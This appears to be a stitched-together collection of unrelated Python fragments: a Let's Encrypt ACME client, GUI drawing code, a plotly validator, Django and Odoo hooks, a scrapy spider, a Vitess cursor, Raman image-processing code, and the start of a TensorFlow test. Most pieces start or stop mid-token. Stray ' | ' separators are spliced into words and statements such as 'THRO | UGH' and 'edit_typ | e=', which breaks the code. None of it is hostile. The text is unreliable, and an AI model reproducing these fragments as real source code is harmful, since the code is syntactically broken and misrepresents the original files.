subject_alt_names = re.search(r"X509v3 Subject Alternative Name: \n +([^\n]+)\n", out.decode('utf8'), re.MULTILINE|re.DOTALL)
if subject_alt_names is not None:
for san in subject_alt_names.group(1).split(", "):
if san.startswith("DNS:"):
domains.add(san[4:])
# get the certificate domains and expiration
log.info("Registering account...")
code, result = _send_signed_request(CA + "/acme/new-reg", {
"resource": "new-reg",
"agreement": "https://letsencrypt.org/documents/LE-SA-v1.0.1-July-27-2015.pdf",
})
if code == 201:
log.info("Registered!")
elif code == 409:
log.info("Already registered!")
else:
raise ValueError("Error registering: {0} {1}".format(code, result))
# verify each domain
for domain in domains:
log.info("Verifying {0}...".format(domain))
# get new challenge
code, result = _send_signed_request(CA + "/acme/new-authz", {
"resource": "new-authz",
"identifier": {"type": "dns", "value": domain},
})
if code != 201:
raise ValueError("Error requesting challenges: {0} {1}".format(code, result))
# make the challenge file
challenge = [c for c in json.loads(result.decode('utf8'))['challenges'] if c['type'] == "http-01"][0]
token = re.sub(r"[^A-Za-z0-9_\-]", "_", challenge['token'])
keyauthorization = "{0}.{1}".format(token, thumbprint)
wellknown_path = os.path.join(acme_dir, token)
with open(wellknown_path, "w") as wellknown_file:
wellknown_file.write(keyauthorization)
# check that the file is in place
wellknown_url = "http://{0}/.well-known/acme-challenge/{1}".format(domain, token)
try:
resp = urlopen(wellknown_url)
resp_data = resp.read().decode('utf8').strip()
assert resp_data == keyauthorization
except (IOError, AssertionError):
os.remove(wellknown_path)
raise ValueError("Wrote file to {0}, but couldn't download {1}".format(
wellknown_path, wellknown_url))
# notify challenge are met
code, result = _send_signed_request(challenge['uri'], {
"resource": "challenge",
"keyAuthorization": keyauthorization,
})
if code != 202:
raise ValueError("Error triggering challenge: {0} {1}".format(code, result))
# wait for challenge to be verified
while True:
try:
resp = urlopen(challenge['uri'])
challenge_status = json.loads(resp.read().decode('utf8'))
except IOError as e:
raise ValueError("Error checking challenge: {0} {1}".format(
e.code, json.loads(e.read().decode('utf8'))))
if challenge_status['status'] == "pending":
time.sleep(2)
elif challenge_status['status'] == "valid":
log.info("{0} verified!".format(domain))
os.remove(wellknown_path)
break
else:
raise ValueError("{0} challenge did not pass: {1}".format(
domain, challenge_status))
# get the new certificate
log.info("Signing certificate...")
proc = subprocess.Popen(["openssl", "req", "-in", csr, "-outform", "DER"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
csr_der, err = proc.communicate()
code, result = _send_signed_request(CA + "/acme/new-cert", {
"resource": "new-cert",
"csr": _b64(csr_der),
})
if code != 201:
raise ValueError("Error signing certificate: {0} {1}".format(code, result))
# return signed certificate!
log.info("Certificate signed!")
return """-----BEGIN CERTIFICATE-----\n{0}\n-----END CERTIFICATE-----\n""".format(
"\n".join(textwrap.wrap(base64.b64encode(result).decode('utf8'), 64)))
def main(argv):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent("""\
This script automates the process of getting a signed TLS certificate from
Let's Encrypt using the ACME protocol. It will need to be run on your server
and have access to your private account key, so PLEASE READ THRO | UGH IT! It's
only ~200 lines, so it won't take long.
===Example Usage===
python acme_tiny.py --account-key ./account.key --csr ./domain.csr --acme-dir /usr/share/nginx/html/.well-known/acme-challenge/ > sign | ed.crt
===================
===Example Crontab Renewal (once per month)===
0 0 1 * * python /path/to/acme_tiny.py --account-key /path/to/account.key --csr /path/to/domain.csr --acme-dir /usr/share/nginx/html/.well-known/acme-challenge/ > /path/to/signed.crt 2>> /var/log/acme_tiny.log
==============================================
""")
)
parser.add_argument("--account-key", required=True, help="path to your Let's Encrypt account private key")
parser.add_argument("--csr", required=True, help="path to your certificate signing request")
parser.add_argument("--acme-dir", required=True, help="path to the .well-known/acme-challenge/ directory")
parser.add_argument("--quiet", action="store_const", co |
-------
def _in_margins ( self, x, y ):
ml = self.margin_left
mb = self.margin_bottom
return xy_in_bounds( x, y, add_rectangles(
self.bounds,
( ml, mb, -(self.margin_right + ml), -(self.margin_top + mb) ) ) )
#---------------------------------------------------------------------------
# Update any information related to the text content of the control:
#---------------------------------------------------------------------------
def update_text ( self ):
text = self.text
if text == '':
self._text = []
self._tdx = []
self._max_tdx = self._tdy = 0
else:
self._text = _text = text.split( '\n' )
gc = self.gc_temp()
gc.set_font( self.font )
max_tdx = 0
self._tdx = _tdx = [ 0 ] * len( _text )
for i, text in enumerate( _text ):
tdx, tdy, descent, leading = gc.get_full_text_extent( text )
tdy += descent + 5
max_tdx = max( max_tdx, tdx )
_tdx[i] = tdx
self._max_tdx = max_tdx
self._tdy = tdy
#---------------------------------------------------------------------------
# Layout and compute the minimum size of the control:
#---------------------------------------------------------------------------
def layout ( self ):
sdx = self.spacing_width
sdy = self.spacing_height
n = len( self._text )
if n == 0:
tdx = tdy = sdx = sdy = 0
else:
tdx = self._max_tdx
tdy = self._tdy * n
image = self._image
if image is not None:
idx = image.width()
idy = image.height()
else:
idx = idy = sdx = sdy = 0
image_position = self.image_position_
if image_position & LEFT_OR_RIGHT:
itdx = tdx + sdx + idx
if image_position & LEFT:
ix = 0
tx = idx + sdx
else:
tx = 0
ix = tdx + sdx
else:
itdx = max( tdx, idx )
ix = (itdx - idx) / 2.0
tx = (itdx - tdx) / 2.0
if image_position & TOP_OR_BOTTOM:
itdy = tdy + sdy + idy
if image_position & TOP:
iy = tdy + sdy
ty = 0
else:
iy = 0
ty = idy + sdy
else:
itdy = max( tdy, idy )
iy = (itdy - idy) / 2.0
ty = (itdy - tdy) / 2.0
bs = 2 * self.border_size
self.min_width = itdx + (self.margin_left + self.margin_right +
self.padding_left + self.padding_right + bs)
self.min_height = itdy + (self.margin_top + self.margin_bottom +
self.padding_top + self.padding_bottom + bs)
self._info = ( ix, iy, idx, idy, tx, ty, tdx, self._tdy, itdx, itdy )
#---------------------------------------------------------------------------
# Draw the contents of the control:
#---------------------------------------------------------------------------
def _draw ( self, gc, view_bounds, mode):
# Set up all the control variables for quick access:
ml = self.margin_left
mr = self.margin_right
mt = self.margin_top
mb = self.margin_bottom
pl = self.padding_left
pr = self.padding_right
pt = self.padding_top
pb = self.padding_bottom
bs = self.border_size
bsd = bs + bs
bsh = bs / 2.0
x, y, dx, dy = self.bounds
ix, iy, idx, idy, tx, ty, tdx, tdy, itdx, itdy = self._info
# Fill the background region (if required);
bg_color = self.bg_color_
if bg_color is not transparent_color:
with gc:
gc.set_fill_color( bg_color )
gc.begin_path()
gc.rect( x + ml + bs, y + mb + bs,
dx - ml - mr - bsd, dy - mb - mt - bsd )
gc.fill_path()
# Draw the border (if required):
if bs > 0:
border_color = self.border_color_
if border_color is not transparent_color:
with gc:
| gc.set_stroke_color( bo | rder_color )
gc.set_line_width( bs )
gc.begin_path()
gc.rect( x + ml + bsh, y + mb + bsh,
dx - ml - mr - bs, dy - mb - mt - bs )
gc.stroke_path()
# Calculate the origin of the image/text box:
text_position = self.text_position_
if self.image_orientation == 'text':
# Handle the 'image relative to text' case:
if text_position & RIGHT:
itx = x + dx - mr - bs - pr - itdx
else:
itx = x + ml + bs + pl
if text_position & HCENTER:
itx += (dx - ml - mr - bsd - pl - pr - itdx) / 2.0
if text_position & TOP:
ity = y + dy - mt - bs - pt - itdy
else:
ity = y + mb + bs + pb
if text_position & VCENTER:
ity += (dy - mb - mt - bsd - pb - pt - itdy) / 2.0
else:
# Handle the 'image relative to component' case:
itx = ity = 0.0
if text_position & RIGHT:
tx = x + dx - mr - bs - pr - tdx
else:
tx = x + ml + bs + pl
if text_position & HCENTER:
tx += (dx - ml - mr - bsd - pl - pr - tdx) / 2.0
if text_position & TOP:
ty = y + dy - mt - bs - pt - tdy
else:
ty = y + mb + bs + pb
if text_position & VCENTER:
ty += (dy - mb - mt - bsd - pb - pt - tdy) / 2.0
image_position = self.image_position_
if image_position & RIGHT:
ix = x + dx - mr - bs - pr - idx
else:
ix = x + ml + bs + pl
if image_position & HCENTER:
ix += (dx - ml - mr - bsd - pl - pr - idx) / 2.0
if image_position & TOP:
iy = y + dy - mt - bs - pt - idy
else:
iy = y + mb + bs + pb
if image_position & VCENTER:
iy += (dy - mb - mt - bsd - pb - pt - idy) / 2.0
with gc:
# Draw the image (if required):
image = self._image
if image is not None:
gc.draw_image( image, ( itx + ix, ity + iy, idx, idy ) )
# Draw the text (if required):
gc.set_font( self.font )
_text = self._text
_tdx = self._tdx
tx += itx
ty += ity + tdy * len( _text )
style = self.style_
shadow_color = self.shadow_color_
text_color = self.color_
for i, text in enumerate( _text ):
ty -= tdy
_tx = tx
if text_position & RIGHT:
_tx += tdx - _tdx[i]
elif text_position & HCENTER:
_tx += (tdx - _tdx[i]) / 2.0
# Draw the 'shadow' text, if requested:
if (style != 0) and (shadow_color is not transparent_color):
if style == EMBOSSED:
gc.set_fill_color( shadow_color )
gc.set_text_position( _tx - 1.0, ty + 1.0 )
elif style == ENGRAVED:
gc.set_fill_color( shadow_color )
gc.set_text_position( _tx + 1.0, ty - 1.0 )
else:
gc.set_fill_color( shadow_color )
gc.set_text_position( _tx + 2.0, ty - 2.0 )
gc.show_text( text )
# Draw the normal text:
gc.set_fill_color( text_color )
gc.set_text_position( _tx, |
import _plotly_utils.basevalid | ators
class BordercolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bordercolor", parent_name="sankey.hoverlabel", **kwargs
):
super(BordercolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_typ | e=kwargs.pop("edit_type", "calc"),
**kwargs
)
|
"""App related signal handlers."""
import redis
from django.conf import settings
from django.db.models import signals
from django.dispatch import receiver
from modoboa.admin import models as admin_models
from . import constants
def set_message_limit(instance, key):
"""Store message limit in Redis."""
old_message_limit = instance._loaded_values.get("message_limit")
if old_message_limit == instance.message_limit:
return
rclient = redis.Redis(
host=settings.REDIS_HOST,
port=settings | .REDIS_PORT,
db=settings.REDIS_QUOTA_DB
)
if instance.message_limit is None | :
# delete existing key
if rclient.hexists(constants.REDIS_HASHNAME, key):
rclient.hdel(constants.REDIS_HASHNAME, key)
return
if old_message_limit is not None:
diff = instance.message_limit - old_message_limit
else:
diff = instance.message_limit
rclient.hincrby(constants.REDIS_HASHNAME, key, diff)
@receiver(signals.post_save, sender=admin_models.Domain)
def set_domain_message_limit(sender, instance, created, **kwargs):
"""Store domain message limit in Redis."""
set_message_limit(instance, instance.name)
@receiver(signals.post_save, sender=admin_models.Mailbox)
def set_mailbox_message_limit(sender, instance, created, **kwargs):
"""Store mailbox message limit in Redis."""
set_message_limit(instance, instance.full_address)
|
# Copyright 2019 Tecnativa - David
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
import logging
from odoo import SUPERUSER_ID, api
_logger = logging.getLogger(__name__)
def pre_init_hook(cr):
"""Speed up the installation of the module on an existing Odoo instance"""
cr.execute(
"""
SELECT column_name
FROM information_schema.columns
WHERE table_name='stock_move' AND
column_name='qty_returnable'
"""
)
if not cr.fetchone():
_logger.info("Creating field qty_returnable on stock_move")
cr.execute(
"""
ALTER TABLE stock_move ADD COLUMN qty_returnable float;
"""
)
cr.execute(
"""
UPDATE stock_move SET qty_returnable = 0
WHERE state IN ('draft', 'cancel')
"""
)
cr.execute(
"""
UPDATE stock_move SET qty_returnable = product_uom_qty
WHERE state = 'done'
"""
)
def post_init_hook(cr, registry):
"""Set moves returnable qty on hand"""
with api.Environment.manage():
env = api.Environment(cr, SUPERUSER_ID, {})
moves_draft = env["stock.move"].search([("state", "in", ["draft", "cancel"])])
moves_no_return_pendant = env["stock.move"].search(
[
("returned_move_ids", "=", False),
("state", "not in", ["draft", "cancel", "done"]),
]
)
moves_by_reserved_availability = {}
for move in moves_no_return_pendant:
moves_by_reserved_availability.setdefault(move.reserved_avail | ability, [])
m | oves_by_reserved_availability[move.reserved_availability].append(move.id)
for qty, ids in moves_by_reserved_availability.items():
cr.execute(
"UPDATE stock_move SET qty_returnable = %s " "WHERE id IN %s",
(qty, tuple(ids)),
)
moves_no_return_done = env["stock.move"].search(
[
("returned_move_ids", "=", False),
("state", "=", "done"),
]
)
# Recursively solve quantities
updated_moves = moves_no_return_done + moves_draft + moves_no_return_pendant
remaining_moves = env["stock.move"].search(
[
("returned_move_ids", "!=", False),
("state", "=", "done"),
]
)
while remaining_moves:
_logger.info("{} moves left...".format(len(remaining_moves)))
remaining_moves, updated_moves = update_qty_returnable(
cr, remaining_moves, updated_moves
)
def update_qty_returnable(cr, remaining_moves, updated_moves):
for move in remaining_moves:
if all([x in updated_moves for x in move.returned_move_ids]):
quantity_returned = sum(move.returned_move_ids.mapped("qty_returnable"))
quantity = move.product_uom_qty - quantity_returned
cr.execute(
"UPDATE stock_move SET qty_returnable = %s " "WHERE id = %s",
(quantity, move.id),
)
remaining_moves -= move
updated_moves += move
return remaining_moves, updated_moves
|
# -*- coding:utf8 -*-
from scrapy import Request
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from scrapy.loader.processors import Join
from scrapy.loader import ItemLoader
from scrapy.selector import HtmlXPathSelector, Selector
from zadolbali.items import StoryItem
class StoryLoader(ItemLoader):
default_output_processor = Join(' ')
class StoriesSpider(CrawlSpider):
name = 'stories'
allowed_domains = ['zadolba.li']
start_urls = ['http://zadolba.li/']
rules = (
Rule(LinkExtractor(allow=('/[0-9]{8}', )), callback='parse_day', follow=True),
)
def parse_day(self, response):
for url in response.xpath('//div[@class="story"]/h2/a/@href').extract():
request = Request(StoriesSpider.start_urls[0] + str(url)[1:], callback=self.parse_story)
request.meta['date'] = response.url.split('/')[-1]
yield request
def parse_story(self, response):
hxs = HtmlXPathSelector(response)
loader = StoryLoader(StoryItem(), hxs)
loader.add_xpath('id', '//div[@class="story"]/div[@class="id"]/span/text()')
loader.add_xpath('title', '//div[@class="story"]/h1/text()')
loader.add_value('published', str(response.request.met | a['date']))
loader.add_xpath('tags', '//div[@class="story"]/div[@class="meta"]/div[@class="tags"]/ul/li/a/@href')
loader.add_xpath('text', 'string(//div[@class="story"]/div[@class="text"])')
loader.add_xpath('likes', 'string(//div[@class="story"]/div[@c | lass="actions"]//div[@class="rating"])')
loader.add_xpath('hrefs', '//div[@class="story"]/div[@class="text"]//a/@href')
loader.add_value('hrefs', '')
loader.add_value('url', str(response.url))
return loader.load_item() |
from vtdb import base_cursor
from vtdb import dbexceptions
write_sql_pattern = re.compile(r'\s*(insert|update|delete)', re.IGNORECASE)
def ascii_lower(string):
"""Lower-case, but only in the ASCII range."""
return string.encode('utf8').lower().decode('utf8')
class VTGateCursorMixin(object):
def connection_list(self):
return [self._conn]
def is_writable(self):
return self._writable
class VTGateCursor(base_cursor.BaseListCursor, VTGateCursorMixin):
"""A cursor for execute statements to VTGate.
Results are stored as a list.
"""
def __init__(
self, connection, tablet_type, keyspace=None,
shards=None, keyspace_ids=None, keyranges=None,
writable=False, as_transaction=False, single_db=False,
twopc=False):
"""Init VTGateCursor.
Args:
connection: A PEP0249 connection object.
tablet_type: Str tablet_type.
keyspace: Str keyspace or None if ba | tch API will be used.
shards: List of strings.
keyspace_ids: Struct('!Q').packed keyspace IDs.
keyranges: Str keyranges.
writable: True if writable.
as_transaction: True if an executemany call is its own transaction.
single_db: True if sing | le db transaction is needed.
twopc: True if 2-phase commit is needed.
"""
super(VTGateCursor, self).__init__(single_db=single_db, twopc=twopc)
self._conn = connection
self._writable = writable
self.description = None
self.index = None
self.keyspace = keyspace
self.shards = shards
self.keyspace_ids = keyspace_ids
self.keyranges = keyranges
self.lastrowid = None
self.results = None
self.routing = None
self.rowcount = 0
self.tablet_type = tablet_type
self.as_transaction = as_transaction
self._clear_batch_state()
# pass kwargs here in case higher level APIs need to push more data through
# for instance, a key value for shard mapping
def execute(self, sql, bind_variables, **kwargs):
"""Perform a query, return the number of rows affected."""
self._clear_list_state()
self._clear_batch_state()
if self._handle_transaction_sql(sql):
return
entity_keyspace_id_map = kwargs.pop('entity_keyspace_id_map', None)
entity_column_name = kwargs.pop('entity_column_name', None)
write_query = bool(write_sql_pattern.match(sql))
# NOTE: This check may also be done at higher layers but adding it
# here for completion.
if write_query:
if not self.is_writable():
raise dbexceptions.ProgrammingError('DML on a non-writable cursor', sql)
if entity_keyspace_id_map:
raise dbexceptions.ProgrammingError(
'entity_keyspace_id_map is not allowed for write queries')
# FIXME(alainjobart): the entity_keyspace_id_map should be in the
# cursor, same as keyspace_ids, shards, keyranges, to avoid this hack.
if entity_keyspace_id_map:
shards = None
keyspace_ids = None
keyranges = None
else:
shards = self.shards
keyspace_ids = self.keyspace_ids
keyranges = self.keyranges
self.results, self.rowcount, self.lastrowid, self.description = (
self.connection._execute( # pylint: disable=protected-access
sql,
bind_variables,
tablet_type=self.tablet_type,
keyspace_name=self.keyspace,
shards=shards,
keyspace_ids=keyspace_ids,
keyranges=keyranges,
entity_keyspace_id_map=entity_keyspace_id_map,
entity_column_name=entity_column_name,
not_in_transaction=not self.is_writable(),
effective_caller_id=self.effective_caller_id,
**kwargs))
return self.rowcount
def fetch_aggregate_function(self, func):
return func(row[0] for row in self.fetchall())
def fetch_aggregate(self, order_by_columns, limit):
"""Fetch from many shards, sort, then remove sort columns.
A scatter query may return up to limit rows. Sort all results
manually order them, and return the first rows.
This is a special-use function.
Args:
order_by_columns: The ORDER BY clause. Each element is either a
column, [column, 'ASC'], or [column, 'DESC'].
limit: Int limit.
Returns:
Smallest rows, with up to limit items. First len(order_by_columns)
columns are stripped.
"""
sort_columns = []
desc_columns = []
for order_clause in order_by_columns:
if isinstance(order_clause, (tuple, list)):
sort_columns.append(order_clause[0])
if ascii_lower(order_clause[1]) == 'desc':
desc_columns.append(order_clause[0])
else:
sort_columns.append(order_clause)
# sort the rows and then trim off the prepended sort columns
if sort_columns:
sorted_rows = list(sort_row_list_by_columns(
self.fetchall(), sort_columns, desc_columns))[:limit]
else:
sorted_rows = itertools.islice(self.fetchall(), limit)
neutered_rows = [row[len(order_by_columns):] for row in sorted_rows]
return neutered_rows
def _clear_batch_state(self):
"""Clear state that allows traversal to next query's results."""
self.result_sets = []
self.result_set_index = None
def close(self):
super(VTGateCursor, self).close()
self._clear_batch_state()
def executemany(self, sql, params_list, **kwargs):
"""Execute multiple statements in one batch.
This adds len(params_list) result_sets to self.result_sets. Each
result_set is a (results, rowcount, lastrowid, fields) tuple.
Each call overwrites the old result_sets. After execution, nextset()
is called to move the fetch state to the start of the first
result set.
Args:
sql: The sql text, with %(format)s-style tokens. May be None.
params_list: A list of the keyword params that are normally sent
to execute. Either the sql arg or params['sql'] must be defined.
**kwargs: passed as is to connection._execute_batch.
"""
if sql:
sql_list = [sql] * len(params_list)
else:
sql_list = [params.get('sql') for params in params_list]
bind_variables_list = [params['bind_variables'] for params in params_list]
keyspace_list = [params['keyspace'] for params in params_list]
keyspace_ids_list = [params.get('keyspace_ids') for params in params_list]
shards_list = [params.get('shards') for params in params_list]
self._clear_batch_state()
# Find other _execute_batch calls in test code.
self.result_sets = self.connection._execute_batch( # pylint: disable=protected-access
sql_list, bind_variables_list, keyspace_list, keyspace_ids_list,
shards_list,
self.tablet_type, self.as_transaction, self.effective_caller_id,
**kwargs)
self.nextset()
def nextset(self):
"""Move the fetch state to the start of the next result set.
self.(results, rowcount, lastrowid, description) will be set to
the next result_set, and the fetch-commands will work on this
result set.
Returns:
True if another result set exists, False if not.
"""
if self.result_set_index is None:
self.result_set_index = 0
else:
self.result_set_index += 1
self._clear_list_state()
if self.result_set_index < len(self.result_sets):
self.results, self.rowcount, self.lastrowid, self.description = (
self.result_sets[self.result_set_index])
return True
else:
self._clear_batch_state()
return None
class StreamVTGateCursor(base_cursor.BaseStreamCursor, VTGateCursorMixin):
"""A cursor for streaming statements to VTGate.
Results are returned as a generator.
"""
def __init__(
self, connection, tablet_type, keyspace=None,
shards=None, keyspace_ids=None,
keyranges=None, writable=False):
super(StreamVTGateCursor, self).__init__()
self._conn = connection
self._writable = writable
self.keyspace = keyspace
self.shards = shards
self.keyspace_ids = keyspace_ids
self.keyranges = keyranges
self.routing = None
self.tablet_type = tablet_type
def is_writable(self):
return self._writable
# pass |
ransform(datan)
data_components_all=nmf.components_
return data_decomp_all,data_components_all
def rgb_comp(arr2d, affine=True):
cmy_cmyk=lambda a:a[:3]*(1.-a[3])+a[3]
rgb_cmy=lambda a:1.-a
rgb_cmyk=lambda a:rgb_cmy(cmy_cmyk(a))
return numpy.array([rgb_cmyk(a) for a in arr2d])
def imGen(data_decomp_all,ramaninfod,cmykindeces=[3, 2, 1, 0]):
cmykvals=copy.copy(data_decomp_all[:, cmykindeces])
cmykvals/=cmykvals.max(axis=0)[numpy.newaxis, :]
img=numpy.reshape(rgb_comp(cmykvals), (ramaninfod['xshape'], ramaninfod['yshape'], 3))
return img
def findEdges(img_gray, sigma = 0.33):
#this uses automatic thresholding from one of the cv2 tutorials
v = np.median(img_gray[img_gray>0])
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
edges = cv2.Canny(np.uint8(img_gray),lower,upper)
return edges
def findContours(edges):
#the contours are now found by searching the most external convex hull
#this way mos of the not fully closed samples are detected as well
im2, contours, hierarchy = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
iWithContour = cv2.drawContours(edges, contours, -1, (255,20,100), 5)
mapimage = np.zeros_like(edges)
#this fills the contours
for i in range(len(contours)):
cv2.drawContours(mapimage, contours, i, color=255, thickness=-1)
#this is to calculate the center of each contour
x=[]
y=[]
for c in contours:
# compute the center of the contour
M = cv2.moments(c)
try:
x.append(M['m10']/(M['m00']))
y.append(M['m01']/(M['m00']))
except:
#this was nessesary as the divisor is sometimes 0
#yield good results but should be done with caution
x.append(M['m10']/(M['m00']+1e-23))
y.append(M['m01']/(M['m00']+1e-23))
return iWithContour, mapimage, contours, x, y
mainapp=QApplication(sys.argv)
form=MainMenu(None, execute=False)
#form.show()
#form.setFocus()
#mainapp.exec_()
parseui=form.parseui
alignui=form.alignui
parseui.rawpathLineEdit.setText(pathd['ramanfile'])
parseui.infopathLineEdit.setText(pathd['infopck'])
parseui.getinfo(ramaninfop=pathd['infopck'], ramanfp=pathd['ramanfile'])#opens or creates
if os.path.isfile(pathd['allspectra']):
with open(pathd['allspectra'], mode='rb') as f:
fullramandataarray=numpy.load(f)
elif 1:
fullramandataarray=parseui.readfullramanarray(pathd['ramanfile'])#opens or creates
with open(pathd['allspectra'], mode='wb') as f:
numpy.save(f, fullramandataarray)
ramaninfod=parseui.ramaninfod
#parseui.exec_()
#ramaninfod['number of spectra']
#ramaninfod['xdata']
#ramaninfod['ydata']
#ramaninfod['Wavenumbers_str']
| #ramaninfod['Spectrum 0 index']
ramaninfod['xdata']/=1000.
ramaninfod['ydata']/=1000.#convert to mm
ramaninfod['xshape']= len(np.unique(ramaninfod['xdata']))
ramaninfod['yshape']= len(np.unique(ramaninfod['ydata']))
ramaninfod['dx']= (ramaninfod['xdata'].max()-ramaninfod['xdata'].min())/(ramaninfod['xshape']-1)
ramaninfod['dy']= (ramaninfod['ydata'].max()-ramaninfod['ydata'].min())/(ramaninfod['yshape']-1)
nx=dx_smp/ramaninfod['dx']
ny=dy_smp/ramaninf | od['dy']
ntot=nx*ny
ramanreshape=lambda arr: np.reshape(arr, (ramaninfod['xshape'], ramaninfod['yshape'])).T[::-1, ::-1]
ramannewshape=(ramaninfod['yshape'], ramaninfod['xshape'])
image_of_x=ramanreshape(ramaninfod['xdata'])
image_of_y=ramanreshape(ramaninfod['ydata'])
#extent=[ramaninfod['xdata'].max(), ramaninfod['xdata'].min(), ramaninfod['ydata'].min(), ramaninfod['ydata'].max()]
#extent=[ramaninfod['xdata'].max(), ramaninfod['xdata'].min(), ramaninfod['ydata'].max(), ramaninfod['ydata'].min()]
extent=[image_of_x[0, 0], image_of_x[-1, -1], image_of_y[0, 0], image_of_y[-1, -1]]
def ramanimshow(im, **kwargs):
plt.imshow(im, origin='lower', interpolation='none', aspect=1, extent=extent, **kwargs)
if os.path.isfile(pathd['nmfdata']):
with open(pathd['nmfdata'], mode='rb') as f:
tempd=pickle.load(f)
data_decomp_all,data_components_all,rgbimagedata=[tempd[k] for k in 'data_decomp_all,data_components_all,rgbimagedata'.split(',')]
else:
data_decomp_all,data_components_all = doNMF(fullramandataarray,4)
#rgbimagedata=imGen(data_decomp_all,ramaninfod)
rgbimagedata=np.zeros(ramannewshape+(3,), dtype='float32')
for i, arr in enumerate(data_decomp_all[:, :3].T):
if nmf_scaling_algorithm_for_image=='scale_by_max':
arr/=arr.max()
elif nmf_scaling_algorithm_for_image=='scale_log_by_max':
arr[arr!=0]=numpy.log10(arr[arr!=0])
arr/=arr.max()
rgbimagedata[:, :, i]=np.array([ramanreshape(arr)])
tempd={}
tempd['data_decomp_all']=data_decomp_all
tempd['data_components_all']=data_components_all
tempd['rgbimagedata']=rgbimagedata
with open(pathd['nmfdata'], mode='wb') as f:
tempd=pickle.dump(tempd, f)
#plt.clf()
#rgbimagedata=np.zeros(ramannewshape+(3,), dtype='float32')
#for i, arr in enumerate(data_decomp_all[:, :3].T):
# arr[arr!=0]=numpy.log10(arr[arr!=0])
# rgbimagedata[:, :, i]=np.array([ramanreshape(arr/arr.max())])
#ramanimshow(rgbimagedata)
#plt.show()
if 1 and os.path.isfile(pathd['blobd']):
with open(pathd['blobd'], mode='rb') as f:
blobd=pickle.load(f)
else:
edges = np.zeros(ramannewshape, dtype='uint8')
searchforoptimalbool=isinstance(find_edges_sigma_value, list)
ltemp=find_edges_sigma_value if searchforoptimalbool else [find_edges_sigma_value]
plt.clf()
for sigmacount, sigmaval in enumerate(ltemp):
if searchforoptimalbool:
plt.subplot(2, len(find_edges_sigma_value), sigmacount+1)
for i in range(data_decomp_all.shape[1]):
if nmf_scaling_algorithm_for_edge=='scale_by_max':
datadecomptemp=data_decomp_all[:,i]/data_decomp_all[:,i].max()
elif nmf_scaling_algorithm_for_edge=='scale_log_by_max':
datadecomptemp=data_decomp_all[:,i]
datadecomptemp[datadecomptemp!=0]=numpy.log10(datadecomptemp[datadecomptemp!=0])
datadecomptemp/=datadecomptemp.max()
arr=np.uint8(ramanreshape(datadecomptemp)*254)
edgetemp=findEdges(arr, sigma=sigmaval)
# plt.imshow(edgetemp)
# plt.show()
edges[np.where(edgetemp>0)] = 244
ramanimshow(edges)
if searchforoptimalbool:
plt.subplot(2, len(find_edges_sigma_value), len(find_edges_sigma_value)+sigmacount+1)
else:
plt.savefig(pathd['edges'])
plt.clf()
im2, contours, hierarchy = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
image_of_inds=ramanreshape(numpy.arange(ramaninfod['number of spectra']))
mapfill = np.zeros(ramannewshape, dtype='uint8')
blobd={}
l_mask=[cv2.drawContours(np.zeros(ramannewshape, dtype='uint8'), contours, i, color=1, thickness=-1) for i in range(len(contours))]
l_imageinds=[numpy.where(maski==1) for maski in l_mask]
l_xycen=np.array([[image_of_x[imageindsi].mean(), image_of_y[imageindsi].mean()] for imageindsi in l_imageinds])
indstomerge=sorted([(count2+count+1, count) for count, xy0 in enumerate(l_xycen[:-1]) for count2, xy1 in enumerate(l_xycen[count+1:]) if ((xy0-xy1)**2).sum()<(dx_smp**2+dy_smp**2)/5.])[::-1]
#indstomerge has highest index first so merge going down
for indhigh, indlow in indstomerge:
# imageinds=l_imageinds.pop(indhigh)
# mask=l_mask.pop(indhigh)
imageinds=l_imageinds[indhigh]
mask=l_mask[indhigh]
l_mask[indlow][imageinds]=1#update only the masks and then update everythign else afterwards
l_imageinds=[numpy.where(maskj==1) for maskj in l_mask]
l_xycen=np.array([[image_of_x[imageindsj].mean(), image_of_y[imageindsj].mean()] for imageindsj in l_imageinds])
for imageinds, mask in zip(l_imageinds, l_mask):
indsinblob=sorted(list(image_of_inds[imageinds |
"""Tests for control_flow_ops.py."""
import tensorflow.python.platform
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import ops
from tensorflow.python.framework.test_util import TensorFlowTestCase
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import standard_ops as tf
from tensorflow.python.platform import googletest
class GroupTestCase(TensorFlowTestCase):
def _StripNode(self, nd):
snode = graph_pb2.NodeDef(name=nd.name, op=nd.op, input=nd.input)
if nd.device:
snode.device = nd.device
return snode
def _StripGraph(self, gd):
"""Copy gd keeping only, node.name, node.op, node.input, and node.device."""
return graph_pb2.GraphDef(node=[self._StripNode(nd) for nd in gd.node])
def testGroup_NoDevices(self):
with ops.Graph().as_default() as g:
a = tf.constant(0, name="a")
b = tf.constant(0, name="b")
c = tf.constant(0, name="c")
tf.group(a.op, b.op, c.op, name="root")
gd = g.as_graph_def()
self.assertProtoEquals("""
node { name: "a" op: "Const"}
node { name: "b" op: "Const"}
node { name: "c" op: "Const"}
node { name: "root" op: "NoOp" input: "^a" input: "^b" input: "^c" }
""", self._StripGraph(gd))
def testGroup_OneDevice(self):
with ops.Graph().as_default() as g:
with g.device("/task:0"):
a = tf.constant(0, name="a")
b = tf.constant(0, name="b")
tf.group(a.op, b.op, name="root")
gd = g.as_graph_def()
self.assertProtoEquals("""
node { name: "a" op: "Const" device: "/task:0" }
node { name: "b" op: "Const" device: "/task:0" }
node { name: "root" op: "NoOp" input: "^a" input: "^b" device: "/task:0" }
""", self._StripGraph(gd))
def testGroup_MultiDevice(self):
with ops.Graph().as_default() as g:
with g.device("/task:0"):
a = tf.constant(0, name="a")
b = tf.constant(0, name="b")
with g.device("/task:1"):
c = tf.constant(0, name="c")
d = tf.constant(0, name="d")
with g.device("/task:2"):
tf.group(a.op, b.op, c.op, d.op, name="root")
gd = g.as_graph_def()
self.assertProtoEquals("""
